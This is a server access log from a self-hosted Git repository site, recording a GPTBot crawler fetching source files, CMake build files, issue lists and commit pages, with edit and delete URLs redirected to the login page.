"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 12169] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11994] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:18:20:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:18:20:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:18:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:18:20:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" -[17/Feb/2026:18:20:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11173] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11276] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2f%20PostgreSQL%20%ec%9e%91%ec%97%85.md" [Client 74.7.227.38] [Length 20791] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" -[17/Feb/2026:18:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15272] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11198] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:20:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:18:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16061] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11299] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15247] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15131] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11235] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.25] [Sent-to 192.168.0.250] 